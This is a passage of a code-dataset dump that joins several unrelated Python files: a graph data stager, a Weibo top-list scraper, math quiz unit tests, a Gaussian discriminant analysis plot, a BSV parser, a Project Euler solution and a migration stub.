stop and restart!\".format(expected_num_nodes, expected_num_edges))\n\n if (self.random.random() <= GraphDataStager.DATA_NAMES[self.data_name][\"label_inject_fraction\"]) and \\\n (edge_id in self.edge_labels): # TODO: don't think this second condition needs to be here\n sample_label = True\n sample_edge_val = self.edge_labels[edge_id]\n else:\n sample_label = False\n sample_edge_val = 0.0\n\n node1, node2 = edge_id # edges already sorted\n\n\n if node1 not in nodes_interesected_graph:\n nodes_interesected_graph.add(node1)\n if node2 not in nodes_interesected_graph:\n nodes_interesected_graph.add(node2)\n\n # We want to skip processing this if it was neither in graph nor in sample label.\n if (edge_id not in self.graph) and (not sample_label):\n continue\n\n # compute jaccard if its missing in the graph\n # this could still be in the labels, but we only have to compute jaccard if it is not in the graph\n if edge_id not in self.graph:\n # it has to be in the label graph if its not in the data graph\n interests_a = interest_graph_index[node1]\n interests_b = interest_graph_index[node2]\n # edge_jaccard is guaranteed to be computable including\n # when it is 0 because all nodes in labels are also in\n # the data graph because of prefiltering.\n edge_jaccard = (len(interests_a & interests_b)\n / (len(interests_a | interests_b) + GraphDataStager.DATA_NAMES[self.data_name][\"k_regularization\"]))\n # add 1.0 to the jaccard value in the graph if its in the graph\n else:\n # it has to be in the original graph if its not in the edge_label graph\n edge_jaccard = self.graph[edge_id]\n if GraphDataStager.DATA_NAMES[self.data_name][\"sum_edges\"]:\n # compute sum of weights\n updated_edge_jaccard = edge_jaccard + sample_edge_val\n else:\n # when labels are 1/0 then alpha controls what fraction of contribution comes from data\n # when alpha is 0, the output graph is purely based on the label graph\n # when alpha is 1, the label is not used\n updated_edge_jaccard = (edge_jaccard * GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"]\n + sample_edge_val * (1 - GraphDataStager.DATA_NAMES[self.data_name][\"data_alpha\"]))\n\n if updated_edge_jaccard < self.sim_threshold:\n if edge_id in self.graph:\n del self.graph[edge_id]\n continue\n\n num_edges_saved += 1\n\n if sample_label:\n del self.edge_labels[edge_id] # cannot have edge in self.graph and self.edge_labels\n all_injected_edges_count += 1\n if all_injected_edges_count % 1000 == 0:\n print(\"Injected {} edges...\".format(all_injected_edges_count))\n if edge_id not in self.graph:\n # only injected labels that are in the graph are added to the label_similarities_file\n label_similarities_file.write(\"{}\\t{}\\t{}\\n\".format(node1, node2, edge_jaccard))\n sparse_injected_labels_jaccard_sum += edge_jaccard\n sparse_injected_edges_count += 1\n # We don't need to update the interest_graph_index and\n # graph_rindex even though it would be invalid for\n # the new nodes being added here. Most of the nodes\n # will already be there.\n if node1 not in self.graph_nodes:\n self.graph_nodes.add(node1)\n if node2 not in self.graph_nodes:\n self.graph_nodes.add(node2)\n self.graph[edge_id] = updated_edge_jaccard\n \n print(\"Total number of nodes in the graph after label injection: {}\".format(len(self.graph_nodes)))\n if sparse_injected_edges_count == 0:\n print(\"No injected edges found in graph\")\n else:\n print(\"Sparse average label jaccard values: {}\"\n .format(sparse_injected_labels_jaccard_sum / sparse_injected_edges_count))\n if all_injected_edges_count == 0:\n print(\"No edges were injected into graph\")\n else:\n print(\"Full average label jaccard values: {}\"\n .format(sparse_injected_labels_jaccard_sum / all_injected_edges_count))\n\n self.remove_disconnected_nodes()\n # Add cannot_link labels to edge_lables\n\n print(\"Found {} total no. of nodes and {} edges in intersected graph\".format(len(nodes_interesected_graph), len(combined_graph_edges)))\n\n # this is not used any more! our measurement infers negative edges\n # cannot_link_labels = GraphDataStager.generate_communities_cannot_link_labels(\n # labels_nodes=edge_labels_nodes,\n # must_link_labels=self.edge_labels,\n # graph=self.graph,\n # seed=for the millionth time pass the damn seed here!> to make your experiments predictable\n # )\n # self.edge_labels.update(cannot_link_labels)\n\n # now save the labels and graph\n self.save_graph()\n self.save_edge_labels()\n\n def _generate_graph_and_labels_socialbot(self):\n\n if self.num_points_sample is not None:\n raise GraphDataStagerException(\"socialbot dataset does not support node sampling in GDA\")\n\n tmp_graph = list()\n tmp_node_id_mapping = dict() # dict: str node ID -> int node ID\n tmp_graph_nodes = set()\n\n id_gen = itertools.count()\n\n start_time = default_timer()\n print(\"loading graph from file...\", end=\"\", flush=True)\n\n with open(os.path.join(self.input_data_dir, \"post_graph.jsonl\")) as f:\n for line in f:\n line_dict = json.loads(line)\n str_node_id_1 = line_dict[\"id1\"]\n str_node_id_2 = line_dict[\"id2\"]\n weight = line_dict[\"sim\"]\n\n if str_node_id_1 in tmp_node_id_mapping:\n node_id_1 = tmp_node_id_mapping[str_node_id_1]\n else:\n node_id_1 = next(id_gen)\n tmp_node_id_mapping[str_node_id_1] = node_id_1\n if str_node_id_2 in tmp_node_id_mapping:\n node_id_2 = tmp_node_id_mapping[str_node_id_2]\n else:\n node_id_2 = next(id_gen)\n tmp_node_id_mapping[str_node_id_2] = node_id_2\n\n if weight >= self.sim_threshold:\n if node_id_1 not in tmp_graph_nodes:\n tmp_graph_nodes.add(node_id_1)\n if node_id_2 not in tmp_graph_nodes:\n tmp_graph_nodes.add(node_id_2)\n tmp_graph.append((node_id_1, node_id_2, weight))\n\n print(\" done. (time={:.2f} s)\".format(default_timer() - start_time))\n\n start_time = default_timer()\n print(\"reorganizing graph in memory...\", end=\"\", flush=True)\n # needs to be done so that node IDs are contiguous 0-indexed\n\n reverse_tmp_node_id_mapping = reverse_dict(tmp_node_id_mapping)\n tmp_to_node_id_mapping = dict()\n self.node_id_mapping = dict()\n for new_node_id, tmp_node_id in enumerate(tmp_graph_nodes):\n tmp_to_node_id_mapping[tmp_node_id] = new_node_id\n self.node_id_mapping[reverse_tmp_node_id_mapping[tmp_node_id]] = new_node_id\n del tmp_node_id_mapping\n del reverse_tmp_node_id_mapping\n\n self.graph.clear()\n while tmp_graph:\n tmp_node_id_1, tmp_node_id_2, weight = tmp_graph.pop()\n self.graph[tmp_to_node_id_mapping[tmp_node_id_1], tmp_to_node_id_mapping[tmp_node_id_2]] = weight\n del tmp_graph\n\n self.graph_nodes.clear()\n for tmp_node_id in tmp_graph_nodes:\n self.graph_nodes.add(tmp_to_node_id_mapping[tmp_node_id])\n del tmp_graph_nodes\n del tmp_to_node_id_mapping\n\n print(\" done. (time={:.2f} s)\".format(default_timer() - start_time))\n\n print(\"saving graph to file...\")\n self.save_graph()\n\n # socialbot has human labels; shouldn't be output by stager\n # self.save_edge_labels()\n\n @property\n def node_based_graph(self):\n \"\"\"\n Getter for self.node_based_graph.\n\n This system is good because some algorithms don't need\n self.node_based_graph at all, so this way the node-based graph is only\n computed if it is needed, AND only computed once.\n\n :return: node based graph\n :rtype: dict\n \"\"\"\n if self._node_based_graph is None:\n\n # defaultdict makes the code much cleaner\n node_based_graph = defaultdict(dict)\n for (id1, id2), weight in self.graph.items():\n node_based_graph[id1][id2] = weight\n node_based_graph[id2][id1] = weight\n\n # conversion to dict avoids new keys being added by attempted key access, and is O(N)\n self._node_based_graph = dict(node_based_graph)\n\n return self._node_based_graph\n\n def _generate_0indexed_sequential_id_mapping(self):\n \"\"\"\n Generate a mapping and reverse mapping for the graph nodes, where the\n new IDs are 0-indexed and sequential.\n GDA node IDs are the ones used in self.graph_nodes and self.graph and\n self.node_based_graph.\n :return: ID mapping (GDA node ID -> new node ID)\n reverse ID mapping (new node ID -> GDA node ID)\n :rtype: (dict[int, int], dict[int, int])\n \"\"\"\n id_mapping = dict() # dict: new node ID -> GDA node ID\n reverse_id_mapping = dict() # dict: GDA node ID -> new node ID\n for new_node_id, gda_node_id in enumerate(sorted(self.graph_nodes)):\n id_mapping[gda_node_id] = new_node_id\n reverse_id_mapping[new_node_id] = gda_node_id\n return id_mapping, reverse_id_mapping\n\n @staticmethod\n def _write_mapping(id_mapping, filename):\n \"\"\"\n Write an ID mapping to a file.\n :param id_mapping: dict: old node ID -> new node ID\n :type id_mapping: dict[int, int]\n :param filename:\n :type filename: str\n \"\"\"\n with open(filename, \"w\") as f:\n for old_node_id, new_node_id in id_mapping.items():\n f.write(\"{}\\t{}\\n\".format(old_node_id, new_node_id))\n\n @staticmethod\n def check_algorithms(algorithms):\n \"\"\"\n Checks if algos are valid, and if not, raises exception.\n :param algorithms:\n :type algorithms: collections.Iterable[str]\n \"\"\"\n for algorithm in algorithms:\n if algorithm not in ALGO_NAMES:\n raise GraphDataStagerException(\n \"Valid algorithm names are: {}. Algorithm found {} is not a supported!\".format(ALGO_NAMES, algorithm)\n )\n\n def generate_algorithm_graph(self, algorithm):\n \"\"\"\n :param algorithm:\n :type algorithm: str\n \"\"\"\n if len(self.graph) == 0:\n raise GraphDataStagerException(\"graph cannot be empty when calling generate_algorithm_graph\")\n algorithm_dir = os.path.join(self.output_data_dir, algorithm)\n\n if algorithm == \"autohds-g\":\n\n if self.node_id_mapping is None:\n # simulates a dictionary\n # reverse_id_mapping[1234] == \"1234\"\n reverse_id_mapping = IntToStrDict()\n else:\n reverse_id_mapping = reverse_dict(self.node_id_mapping) # int ID -> string ID\n\n # autohds-g is the reference algorithm being measured and needs to be run through genediver so it is staged\n # in the top level output dir\n if GraphDataStager.DATA_NAMES[self.data_name][\"save_autoHDS-G_native_format\"]:\n with open(os.path.join(self.output_data_dir, \"graph.jsonl\"), \"w\") as algorithm_graph_file:\n for node in self.node_based_graph:\n algorithm_graph_file.write(json.dumps({\n \"id\": node,\n \"connections\": tuple(self.node_based_graph[node].items())\n }) + \"\\n\")\n\n if self.node_id_mapping is not None:\n self._write_mapping(reverse_id_mapping, os.path.join(self.output_data_dir, \"graph.mapping.tsv\"))\n\n else:\n\n with open(os.path.join(self.output_data_dir, \"prestaging_graph.jsonl\"), \"w\") as algorithm_graph_file:\n for (id1, id2), sim in self.graph.items():\n algorithm_graph_file.write(json.dumps({\n \"id1\": reverse_id_mapping[id1],\n \"id2\": reverse_id_mapping[id2],\n \"sim\": sim\n }) + \"\\n\")\n\n open(os.path.join(self.output_data_dir, \"experiment_params.txt\"), \"a\").close() # touch\n\n else:\n # create algorithm directory\n if not os.path.exists(algorithm_dir):\n os.makedirs(algorithm_dir)\n\n writer = ALGORITHMS[algorithm](algorithm_dir)\n # we need an ID mapping to make sure the node IDs are contiguous\n id_mapping, _ = self._generate_0indexed_sequential_id_mapping()\n\n # self.graph is (node1,node2): weight, but write graph takes the connection format of:\n # [{\"id\":1, \"connections\":[(node2, weight)]}]\n # todo: only used here, so doesn't need to be a self variable right?\n connections_graph = dict()\n for (node_id_1, node_id_2), weight in self.graph.items():\n node_id_1 = id_mapping[node_id_1]\n node_id_2 = id_mapping[node_id_2]\n if node_id_1 not in connections_graph:\n connections_graph[node_id_1] = list()\n if node_id_2 not in connections_graph:\n connections_graph[node_id_2] = list()\n connections_graph[node_id_1].append((node_id_2, weight))\n connections_graph[node_id_2].append((node_id_1, weight))\n\n connections_list = list()\n for node_id_1, connections in connections_graph.items():\n node_information = {\n \"id\": node_id_1,\n \"connections\": connections\n }\n connections_list.append(node_information)\n writer.write_graph(\n graph=connections_list,\n num_nodes=len(self.graph_nodes),\n num_edges=len(self.graph)\n )\n\n # write node ID mapping to file in algo staging dir\n self._write_mapping(\n id_mapping,\n os.path.join(algorithm_dir, \"id_mapping.tsv\")\n )\n\n def save_mapping(self):\n \"\"\"\n Write a TSV file out to the data set directory containing the node ID\n mapping (\"old_id\\tnew_id\").\n If the nodes were not mapped, the file will not be saved.\n :return: whether the mapping was saved\n :rtype: bool\n \"\"\"\n nodes = self.graph_nodes.copy()\n if self.edge_labels:\n for node_id_1, node_id_2 in self.edge_labels:\n if node_id_1 not in nodes:\n nodes.add(node_id_1)\n if node_id_2 not in nodes:\n nodes.add(node_id_2)\n with open(os.path.join(self.output_data_dir, \"nodes\"), \"w\") as f:\n f.write(\"\\n\".join(map(str, nodes)))\n del nodes\n\n if self.node_id_mapping is None:\n return False\n self._write_mapping(\n self.node_id_mapping,\n os.path.join(self.output_data_dir, \"gda_id_mapping.tsv\")\n )\n return True\n\n def print_metrics(self):\n \"\"\"\n prints metrics\n \"\"\"\n print(\"Graph Data Stager metrics: \" + json.dumps({\n \"num_nodes\": len(self.graph_nodes),\n \"num_label_edges\": len(self.edge_labels),\n \"num_partitional_labels\": len(self.partitional_labels),\n \"num_graph_edges\": len(self.graph)\n }, indent=4))\n\n @staticmethod\n def generate_communities_cannot_link_labels(labels_nodes, must_link_labels, graph, seed):\n \"\"\"\n generates cannot link labels given must link labels\n :param labels_nodes:\n :param must_link_labels:\n :param graph:\n :param seed:\n :return:\n \"\"\"\n # Generate cannot_link labels by finding edge_ids with nodes in\n # edge_labels_nodes that do not meet the jaccard specifications\n print(\"##### Generating cannot link labels\")\n num_must_link_labels = len(must_link_labels)\n\n # TODO: this needs to be in the CLI\n negative_edge_multiples = 2.0\n random = Random(seed)\n\n max_iterations = comb(len(labels_nodes), 2)\n matrix_density = num_must_link_labels / max_iterations\n # we want more negative than positive edges\n target_num_cannot_link_labels = int(negative_edge_multiples * num_must_link_labels)\n # we need to process a little bit extra to get target_num_cannot_link_labels negative edges\n negative_edge_try_count = 1.0 / (1 - matrix_density) * target_num_cannot_link_labels\n # we will produce 2 sets of vertices from original label_nodes using sampling with replacement\n # and then we will zip them together to get the edges\n node_a_sample = list()\n node_b_sample = list()\n # we do this in chunks to make the program run faster even though theoretically this isn't a correct sample\n chunk_size = round(negative_edge_try_count / 1000)\n if chunk_size < 1:\n chunk_size = 1\n num_iterations = int(negative_edge_try_count / chunk_size)\n ticker_size = int(num_iterations / 20)\n for i in range(num_iterations):\n node_a_chunk = random.sample(labels_nodes, chunk_size)\n node_a_sample.extend(node_a_chunk)\n node_b_chunk = random.sample(labels_nodes, chunk_size)\n node_b_sample.extend(node_b_chunk)\n if i % ticker_size == 0:\n print(\"Sampled {} chunks...\".format(i))\n\n num_cannot_link_labels = 0\n cannot_link_labels = dict()\n ticker_size = int(negative_edge_try_count / 20)\n i = 0\n for node_a, node_b in zip(node_a_sample, node_b_sample):\n # create sorted edge id since self.graph and self.edge_labels both have sorted edge_ids\n if node_a > node_b:\n edge_id = (node_b, node_a)\n else:\n edge_id = (node_a, node_b)\n # cannot link labels can't be must-link labels or edges in the graph\n # random.sample will produce duplicates so don't add if its already been added\n if (edge_id in graph) or (edge_id in must_link_labels) or (edge_id in cannot_link_labels):\n continue\n\n cannot_link_labels[edge_id] = 0\n num_cannot_link_labels += 1\n if num_cannot_link_labels % ticker_size == 0:\n print(\"Generated {} cannot link labels...\".format(num_cannot_link_labels))\n\n i += 1\n return cannot_link_labels\n\n def save_data_params(self):\n \"\"\"\n adds the experiment_params.txt\n :return:\n \"\"\"\n params = {\"sim\": self.sim_threshold, \"num_points\": self.num_points_sample}\n params.update(self.DATA_NAMES[self.data_name])\n\n with open(os.path.join(self.output_data_dir, \"params.json\"), \"w\") as f:\n f.write(json.dumps(params))\n","sub_path":"python/graphDataAnalysis/GraphDataStager.py","file_name":"GraphDataStager.py","file_ext":"py","file_size_in_byte":55966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59036214","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 3 21:31:12 2018\r\n\r\n@author: pc1\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\nimport time\r\nfrom requests.exceptions import RequestException\r\nfrom scrapy import Selector\r\n\r\ndef get_page(url):\r\n try:\r\n headers = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'\r\n }\r\n response = requests.get(url,headers=headers)\r\n if response.status_code==200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n return None\r\n \r\ndef page(offset):\r\n link='https://weibo.cn/pub/top?page='+str(offset)\r\n return link\r\n\r\ndata=[]\r\n\r\nfor i in range(1,11):\r\n html_doc = get_page(page(i))\r\n selector=Selector(text=html_doc)\r\n images = selector.css('a img::attr(src)').extract_first()\r\n avatars = selector.xpath('//table/tbody/tr/td[2]/a[1]/text()').extract()\r\n powers = selector.xpath('//table/tbody/tr/td[2]/text()').extract()\r\n for image,avatar,power in zip(images,avatars,powers):\r\n data.append({\r\n '头像信息':image,\r\n '昵称':avatar,\r\n '影响力':power\r\n })\r\n time.sleep(1)\r\n \r\nprint(data)","sub_path":"scrapy简单操练.py","file_name":"scrapy简单操练.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292983594","text":"import unittest\n\nfrom . import MathQuiz, is_math_quiz_enabled\nfrom stepic_plugins.exceptions import FormatError\n\n\n@unittest.skipUnless(is_math_quiz_enabled(), 'sympy is not installed')\nclass MathQuizCheckTest(unittest.TestCase):\n def setUp(self):\n self.default_numerical_test = {\n 'z_re_min': '2',\n 'z_re_max': '3',\n 'z_im_min': '-1',\n 'z_im_max': '1',\n 'max_error': '1e-06',\n 'integer_only': False,\n }\n\n def test_invalid_sources(self):\n diff = [\n {'z_re_min': 'not-a-number'},\n {'z_re_max': 'not-a-number'},\n {'z_im_min': 'not-a-number'},\n {'z_im_max': 'not-a-number'},\n {'max_error': 'not-a-number'},\n {'z_re_min': '42', 'z_re_max': '24'},\n {'z_im_min': '42', 'z_im_max': '24'},\n {'max_error': '-1'},\n ]\n\n for bad_numerical_test in [dict(self.default_numerical_test, **d) for d in diff]:\n bad_source = {'answer': 'x', 'numerical_test': bad_numerical_test}\n with self.assertRaises(FormatError):\n MathQuiz(MathQuiz.Source(bad_source))\n\n def check(self, answer, reply, result, feedback_contains=None,\n feedback_not_contains=None, **kwargs):\n quiz = MathQuiz(MathQuiz.Source({\n 'answer': answer,\n 'numerical_test': dict(self.default_numerical_test, **kwargs),\n }))\n score, feedback = quiz.check(reply, '')\n self.assertEqual(score, result, feedback)\n if feedback_contains is not None:\n if not isinstance(feedback_contains, (list, tuple)):\n feedback_contains = [feedback_contains]\n for msg in feedback_contains:\n self.assertIn(msg, feedback, \"Feedback should contain '{0}'\".format(msg))\n if feedback_not_contains is not None:\n if not isinstance(feedback_not_contains, (list, tuple)):\n feedback_not_contains = [feedback_not_contains]\n for msg in feedback_not_contains:\n self.assertNotIn(msg, feedback, \"Feedback should not contain '{0}'\".format(msg))\n\n def test_check(self):\n self.check('cos(2*x)', 'cos(x+x)', True)\n self.check('cos(2*x)', 'cos(x+x+x)', False)\n self.check('cos(pi)', '-1', True)\n self.check('cos(pi)', '-3', False)\n self.check('x + y', '2*x + y - x', True)\n self.check('pi', '3.141592', True)\n self.check('pi', '3.1415', False)\n self.check('pi', '3.1415', True, max_error='1e-04')\n self.check('33**12-(8*33**7-3*33**2)-2*(9*33**8-10*33**4+1)+2*12*33**3+20*33**4-6',\n '(33**12)-2*(12-3)*(33**(12-4))-(12-4)*(33**(12-5))+2*10*(33**3)*2+6*(33**2)*2',\n False)\n self.check('7**7 / (2**2 * 5**5)', '(3.5**3.5 / 2.5**2.5)**2', True)\n self.check('2*floor(n/2)+n-5', '4*(ceiling(n/2)-3)+3*(1-(n-2*floor(n/2)))+4', False)\n self.check('2*floor(n/2)+n-5', '4*(ceiling(n/2)-3)+3*(1-(n-2*floor(n/2)))+4', True,\n integer_only=True)\n\n def test_check_inequality(self):\n self.check('x > 5', 'x > 5', True)\n self.check('x > -5', 'x - 2 > -7', True)\n self.check('5 <= -2 + sin(x)', 'sin(x) + 4 >= 11', True)\n self.check('x < y ^ z', 'y ^ z > x', True)\n self.check('x > 5', '5', False, feedback_contains='must be an inequality')\n self.check('x > 5', 'x > 3', False, feedback_not_contains='Cannot check answer')\n self.check('x >= 0', 'x > 0', False, feedback_not_contains='Cannot check answer')\n self.check('x >= y + cos(2*x)', 'x > 0', False, feedback_not_contains='Cannot check answer')\n self.check('x', 'x > 5', False,\n feedback_contains='must not be an inequality',\n feedback_not_contains='Cannot check answer')\n\n def test_check_trigonometric_misnaming(self):\n feedback_pattern = 'You wrote \"{wrote}\", maybe you meant to write \"{meant}\".'\n sympy_trigonometric_notation_map = {\n 'tg': 'tan',\n 'ctg': 'cot',\n 'arccos': 'acos',\n 'arcsin': 'asin',\n 'arctg': 'atan',\n 'atg': 'atan',\n 'arcctg': 'acot',\n 'actg': 'acot',\n }\n for f, f_correct in sympy_trigonometric_notation_map.items():\n answer = '{func}(x)'.format(func=f_correct)\n reply = '{func}(x)'.format(func=f)\n expected_feedback = feedback_pattern.format(wrote=f, meant=f_correct)\n\n self.check(answer, reply, False, feedback_contains=expected_feedback)\n self.check('E', 'e', False, feedback_contains=feedback_pattern.format(wrote='e', meant='E'))\n self.check('x+acot(E + y)', 'x+arcctg(e + y)', False,\n feedback_contains=['wrote \"e\"', 'wrote \"arcctg\"'],\n feedback_not_contains=['wrote \"ctg\"', 'wrote \"tg\"'])\n","sub_path":"stepic_plugins/quizzes/math/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161400631","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\nX=np.loadtxt(sys.argv[1]+'/q4x.dat')\nX=X-np.outer(np.ones(X.shape[0]),np.mean(X,axis=0))\nX=X/np.outer(np.ones(X.shape[0]),np.std(X,axis=0))\ny_file=open(sys.argv[1]+'/q4y.dat',\"r\")\ny_list=[]\nm0 = 0\nm1 = 0\nfor i in range(X.shape[0]):\n word = y_file.readline()\n if word == 'Alaska\\n':\n y_list.append(0)\n m0+=1\n if word == 'Canada\\n':\n y_list.append(1)\n m1+=1\ny=np.array(y_list)\n\n# part1 starts here\nmew0 = np.zeros((1,X.shape[1]))\nmew1 = np.zeros((1,X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n mew1 = mew1 + X[i]\n else:\n mew0 = mew0 + X[i]\nmew0 = mew0/m0\nmew1 = mew1/m1\nsigma = np.zeros((X.shape[1],X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n sigma = sigma + np.matmul((X[i]-mew1).T,(X[i]-mew1))\n else:\n sigma = sigma + np.matmul((X[i]-mew0).T,(X[i]-mew0))\nsigma = sigma/X.shape[1]\n# part1 ends here\n\n# part2 starts here\ny0_x0 = []\ny0_x1 = []\ny1_x0 = []\ny1_x1 = []\nfor i in range(X.shape[0]):\n if y[i]:\n y1_x0.append(X[i,0])\n y1_x1.append(X[i,1])\n else:\n y0_x0.append(X[i,0])\n y0_x1.append(X[i,1])\nplt.title('Decision Boundary')\nplt.xlabel('growth ring diameters in fresh water')\nplt.ylabel('growth ring diameters in marine water')\nplt.scatter(y0_x0,y0_x1,color='tomato',marker='o',label='Alaska')\nplt.scatter(y1_x0,y1_x1,color='green',marker='^',label='Canada')\nplt.legend()\n# part2 ends here\n\n# part3 starts here\nx0 = np.outer(np.linspace(min(X[:,0]),max(X[:,0]),30),np.ones(30))\nx1 = np.outer(np.ones(30),np.linspace(min(X[:,1]),max(X[:,1]),30))\nz = np.outer(np.ones(30),np.ones(30))\nfor i in range(30):\n for j in range(30):\n x = [x0[i][j],x1[i][j]]\n z[i][j] = np.matmul((x-mew1),np.matmul(np.linalg.inv(sigma),(x-mew1).T)) - np.matmul((x-mew0),np.matmul(np.linalg.inv(sigma),(x-mew0).T))\nplt.contour(x0,x1,z,colors='m',levels=[0])\n# part3 ends here\n\n# part4 starts here\nsigma0 = np.zeros((X.shape[1],X.shape[1]))\nsigma1 = np.zeros((X.shape[1],X.shape[1]))\nfor i in range(X.shape[0]):\n if y[i]:\n sigma1 = sigma1 + np.matmul((X[i]-mew1).T,(X[i]-mew1))\n else:\n sigma0 = sigma0 + np.matmul((X[i]-mew0).T,(X[i]-mew0))\nsigma0 = sigma0/m0\nsigma1 = sigma1/m1\n# part4 ends here\n\n# part5 starts here\nz = np.outer(np.ones(30),np.ones(30))\nfor i in range(30):\n for j in range(30):\n x = np.array([[x0[i][j],x1[i][j]]])\n phi = m1/X.shape[0]\n a = np.matmul(x,np.matmul(np.linalg.inv(sigma1)-np.linalg.inv(sigma0),x.T))\n b = np.matmul(x,np.matmul(np.linalg.inv(sigma1),mew1.T))\n c = np.matmul(x,np.matmul(np.linalg.inv(sigma0),mew0.T))\n d = np.matmul(mew0,np.matmul(np.linalg.inv(sigma0),mew0.T))\n e = np.matmul(mew1,np.matmul(np.linalg.inv(sigma1),mew1.T))\n f = math.log(phi/(1-phi))\n g = math.log(np.linalg.det(sigma0)/np.linalg.det(sigma1))\n z[i][j] = a - 2*b + 2*c - d + e - 2*f - g\nplt.contour(x0,x1,z,colors='b',levels=[0])\nplt.savefig(sys.argv[2]+'/q4e.png')\n# part5 ends here\n","sub_path":"2018CS50098/q4/q4e.py","file_name":"q4e.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"496328772","text":"from collections import deque\n\n\ndef readBsv(fileName=None, text=None, sep=('][', ')(', '}{')):\n response = {}\n if(fileName is not None):\n f = open(fileName, 'r')\n unsplitBsv = f.read()\n elif(text is not None):\n unsplitBsv = text\n\n firstSep = unsplitBsv[0:2]\n splitBsv = deque(unsplitBsv.split(sep[0]))\n\n if (firstSep == sep[0]):\n #print 'first'\n cleanList = filter(lambda a: a != '', splitBsv)\n rows = len(splitBsv) - len(cleanList) - 1\n #print rows\n columns = [i for i, a in enumerate(splitBsv) if a != '']\n nbrOfColumns = len(columns) / rows\n #print nbrOfColumns\n cleanList = filter(lambda a: a != '', splitBsv)\n #print cleanList\n for c in range(nbrOfColumns):\n col = deque()\n for r in range(0, rows):\n col.append(cleanList[(nbrOfColumns * r) + c])\n\n colName = 'X' + str(c + 1)\n response[colName] = col\n\n if (firstSep == sep[1]):\n rows = splitBsv.count(sep[1]) - 1\n columns = [i for i, a in enumerate(splitBsv) if a != sep[1]]\n nbrOfColumns = len(columns) / rows\n cleanList = filter(lambda a: a != sep[1], splitBsv)\n for c in range(nbrOfColumns):\n col = deque()\n for r in range(0, rows):\n col.append(cleanList[(nbrOfColumns * r) + c])\n\n colName = 'X' + str(c + 1)\n response[colName] = col\n\n if (firstSep == sep[2]):\n response = {}\n hdr = sep[2] + sep[1]\n hdrTxt = splitBsv[0]\n splitHdr = hdrTxt.split(sep[2])\n splitHdr = splitHdr[1:len(splitHdr) - 1]\n splitBsv = [splitBsv[i] for i in range(1, len(splitBsv))]\n rows = 0\n for val in splitBsv:\n if val == sep[1]:\n rows = rows + 1\n\n for colName in splitHdr:\n response[colName] = deque()\n\n columns = len(response)\n cleanList = filter(lambda a: a != sep[1], splitBsv)\n for c, colName in enumerate(splitHdr):\n col = deque()\n for r in range(rows):\n col.append(cleanList[(columns * r) + c])\n\n response[colName] = col\n\n return response\n\n\ndef writeBsv(x, filepath=None, sep=('][', ')(', '}{')):\n response = \"\"\n hdrList = x.keys()\n response = sep[2] + sep[0] + sep[0].join(hdrList) + sep[0] + sep[2]\n nbrOfRows = len(x[hdrList[1]])\n for r in range(0, nbrOfRows):\n row = deque()\n for h, hdr in enumerate(hdrList):\n row.append(x[hdr][r])\n\n response = response + sep[1] + sep[0] + sep[0].join(row) + sep[0]\n response = response + sep[1] + '\\n'\n if filepath is None:\n return response\n else:\n f = open(filepath, 'w')\n f.write(response)\n f.close()\n\n\n#print readBsv(text='][b][s][][v][o][][m][g][')\n#print readBsv(text=\")(][b][s][v][)(][o][m][g][)(\")\n#print readBsv(text=\"}{Col1}{Col2}{)(][b][s][)(][v][o][)(][m][g][)(\")","sub_path":"bsv.py","file_name":"bsv.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"15079425","text":"#!/usr/bin/python\n# Solved by Bogdan Trif @ Completed on Sat, 24 Sep 2016, 12:08\n#The Euler Project https://projecteuler.net\n'''\nPowerful digit sum - Problem 56\nA googol (10**100) is a massive number: one followed by one-hundred zeros; 100**100 is almost unimaginably large:\none followed by two-hundred zeros. Despite their size, the sum of the digits in each number is only 1.\nConsidering natural numbers of the form, a**b, where a, b < 100, what is the maximum digital sum?\n'''\n\n#this one is easy, just compute the numbers power and sum the digits.\n\ncounter=1\nmaxval=0\nfor a in range(50, 100):\n for b in range(80,100):\n counter+=1\n c = list(str(a**b))\n S=0\n for i in range(len(c)):\n S += int(c[i])\n if S > 950 :\n print(str(counter)+'. ',S , ' ',a,'**',b, len(str(a**b)),' ',a**b )\n if maxval < S:\n maxval = S\nprint('The maximum value is : ', maxval)\n\nprint('\\n===============OTHER SOLUTIONS FROM THE EULER FORUM ==============')\nprint('\\n--------------------------SOLUTION 1, travelalone from China --------------------------')\n\n\nmax=0\nfor a in range(1,100):\n for b in range(1,100):\n temp = sum(map(int,list(str(a**b))))\n if temp > max:\n max =temp\nprint (max)\n\nprint('\\n--------------------------SOLUTION 1, LIST COMPREHENSION, zinebl from Algeria --------------------------')\nzinebl","sub_path":"Project EULER/pb056 Powerful digit sum.py","file_name":"pb056 Powerful digit sum.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"202520467","text":"\"\"\"empty message\n\nRevision ID: 87d6c4ba4e59\nRevises: \nCreate Date: 2019-03-24 03:49:30.722354\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '87d6c4ba4e59'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=False),\n sa.Column('usertype', sa.String(length=64), nullable=False),\n 